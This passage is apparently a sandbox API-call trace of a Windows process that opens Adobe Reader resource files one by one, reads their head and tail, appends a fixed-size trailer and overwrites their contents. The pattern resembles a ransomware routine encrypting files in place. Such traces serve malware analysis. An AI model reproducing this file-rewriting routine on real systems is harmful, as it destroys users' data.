dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0115.061] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0115.061] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x4a4 [0115.061] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0115.061] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0115.061] ReleaseMutex (hMutex=0x168) returned 1 [0115.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="prt.fca", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0115.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="prt.fca", cchWideChar=7, lpMultiByteStr=0x1f7ac84, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="prt.fca", lpUsedDefaultChar=0x0) returned 7 [0115.061] ReadFile (in: hFile=0x1fc, lpBuffer=0x28bd6f8, nNumberOfBytesToRead=0x4a4, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x28bd6f8*, lpNumberOfBytesRead=0x2e9f2bc*=0x4a4, lpOverlapped=0x0) returned 1 [0115.066] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0115.066] WriteFile (in: hFile=0x1fc, lpBuffer=0x2867cb8*, nNumberOfBytesToWrite=0xa2c, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2867cb8*, lpNumberOfBytesWritten=0x2e9f2d0*=0xa2c, lpOverlapped=0x0) returned 1 [0115.066] CloseHandle (hObject=0x1fc) returned 1 [0115.066] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rus.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\rus.fca"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0115.067] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0115.067] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x2b8 [0115.068] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0115.068] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0115.068] ReleaseMutex (hMutex=0x168) returned 1 [0115.068] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rus.fca", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0115.068] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rus.fca", cchWideChar=7, lpMultiByteStr=0x1f7ac84, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rus.fca", lpUsedDefaultChar=0x0) returned 7 [0115.068] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e943c8, nNumberOfBytesToRead=0x2b8, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e943c8*, lpNumberOfBytesRead=0x2e9f2bc*=0x2b8, lpOverlapped=0x0) returned 1 [0115.069] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0115.070] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ea3978*, nNumberOfBytesToWrite=0x840, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea3978*, lpNumberOfBytesWritten=0x2e9f2d0*=0x840, lpOverlapped=0x0) returned 1 [0115.070] CloseHandle (hObject=0x1fc) returned 1 [0115.070] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\sgr96.ths" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\sgr96.ths"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0115.071] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0115.071] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xc1000 [0115.071] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0115.072] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0115.072] ReleaseMutex (hMutex=0x168) returned 1 [0115.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sgr96.ths", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0115.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sgr96.ths", cchWideChar=9, lpMultiByteStr=0x1f7344c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sgr96.ths", lpUsedDefaultChar=0x0) returned 9 [0115.072] ReadFile (in: hFile=0x1fc, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2e9f278*=0xf000, lpOverlapped=0x0) returned 1 [0116.497] ReadFile (in: hFile=0x1fc, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0116.508] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0xc0000 [0116.508] ReadFile (in: hFile=0x1fc, lpBuffer=0x2663838, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0116.582] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0xc0000 [0116.583] WriteFile (in: hFile=0x1fc, lpBuffer=0x2667898*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667898*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0116.583] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0116.583] WriteFile (in: hFile=0x1fc, lpBuffer=0x27ec5a8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x27ec5a8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0116.584] WriteFile (in: hFile=0x1fc, lpBuffer=0x27ec5a8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x27ec5a8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0116.584] CloseHandle (hObject=0x1fc) returned 1 [0116.584] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slvphon.env" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\slvphon.env"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0116.589] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0116.589] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x109f [0116.589] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0116.590] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0116.590] ReleaseMutex (hMutex=0x168) returned 1 [0116.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="slvphon.env", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0116.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="slvphon.env", cchWideChar=11, lpMultiByteStr=0x1f735ac, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="slvphon.env", lpUsedDefaultChar=0x0) returned 11 [0116.590] ReadFile (in: hFile=0x1fc, lpBuffer=0x2663838, nNumberOfBytesToRead=0x109f, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2e9f2bc*=0x109f, lpOverlapped=0x0) returned 1 [0116.601] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0116.601] WriteFile (in: hFile=0x1fc, lpBuffer=0x2667898*, nNumberOfBytesToWrite=0x1627, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2667898*, lpNumberOfBytesWritten=0x2e9f2d0*=0x1627, lpOverlapped=0x0) returned 1 [0116.602] CloseHandle (hObject=0x1fc) returned 1 [0116.602] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\swd32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\swd32.clx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0116.603] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0116.603] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x8000 [0116.603] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0116.603] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0116.603] ReleaseMutex (hMutex=0x168) returned 1 [0116.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="swd32.clx", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0116.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="swd32.clx", cchWideChar=9, lpMultiByteStr=0x1f735cc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swd32.clx", lpUsedDefaultChar=0x0) returned 9 [0116.604] ReadFile (in: hFile=0x1fc, lpBuffer=0x2663838, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0116.927] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x7000 [0116.927] ReadFile (in: hFile=0x1fc, lpBuffer=0x2663838, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0117.526] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x7000 [0117.526] WriteFile (in: hFile=0x1fc, lpBuffer=0x2888f18*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2888f18*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0117.535] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0117.535] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e943a8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0117.536] CloseHandle (hObject=0x1fc) returned 1 [0117.538] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\usa03.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\usa03.hsp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0117.539] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0117.539] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x2a6da [0117.539] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0117.540] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0117.540] ReleaseMutex (hMutex=0x168) returned 1 [0117.540] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="usa03.hsp", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0117.540] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="usa03.hsp", cchWideChar=9, lpMultiByteStr=0x1f7342c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="usa03.hsp", lpUsedDefaultChar=0x0) returned 9 [0117.540] ReadFile (in: hFile=0x1fc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2e9f278*=0x8000, lpOverlapped=0x0) returned 1 [0117.598] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x296da [0117.599] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e96408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e96408*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0117.624] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x296da [0117.624] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ea7b88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea7b88*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0117.625] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0117.625] WriteFile (in: hFile=0x1fc, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x2e9f28c*=0x8000, lpOverlapped=0x0) returned 1 [0117.625] CloseHandle (hObject=0x1fc) returned 1 [0117.625] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\JISX0208.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\jisx0208.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0117.626] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0117.626] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x19ea7 [0117.626] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0117.627] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0117.627] ReleaseMutex (hMutex=0x168) returned 1 [0117.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JISX0208.txt", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JISX0208.txt", cchWideChar=12, lpMultiByteStr=0x1f733cc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JISX0208.txt", lpUsedDefaultChar=0x0) returned 12 [0117.627] ReadFile (in: hFile=0x1fc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0117.644] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x18ea7 [0117.644] ReadFile (in: hFile=0x1fc, lpBuffer=0x288ae18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x288ae18*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0117.658] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x18ea7 [0117.659] WriteFile (in: hFile=0x1fc, lpBuffer=0x2864a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0117.664] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0117.664] WriteFile (in: hFile=0x1fc, lpBuffer=0x2886de8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2886de8*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0117.664] CloseHandle (hObject=0x1fc) returned 1 [0117.665] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CORPCHAR.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\corpchar.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0117.665] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0117.666] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x4a08 [0117.666] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0117.666] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0117.666] ReleaseMutex (hMutex=0x168) returned 1 [0117.666] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CORPCHAR.TXT", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.666] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CORPCHAR.TXT", cchWideChar=12, lpMultiByteStr=0x1f7342c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CORPCHAR.TXT", lpUsedDefaultChar=0x0) returned 12 [0117.666] ReadFile (in: hFile=0x1fc, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0117.772] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x3a08 [0117.772] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e963d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e963d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0117.794] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x3a08 [0117.794] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ea8bb8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea8bb8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0117.794] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0117.794] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0117.795] CloseHandle (hObject=0x1fc) returned 1 [0117.795] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\KOREAN.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\korean.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0117.795] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0117.796] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x591cf [0117.796] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0117.796] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0117.796] ReleaseMutex 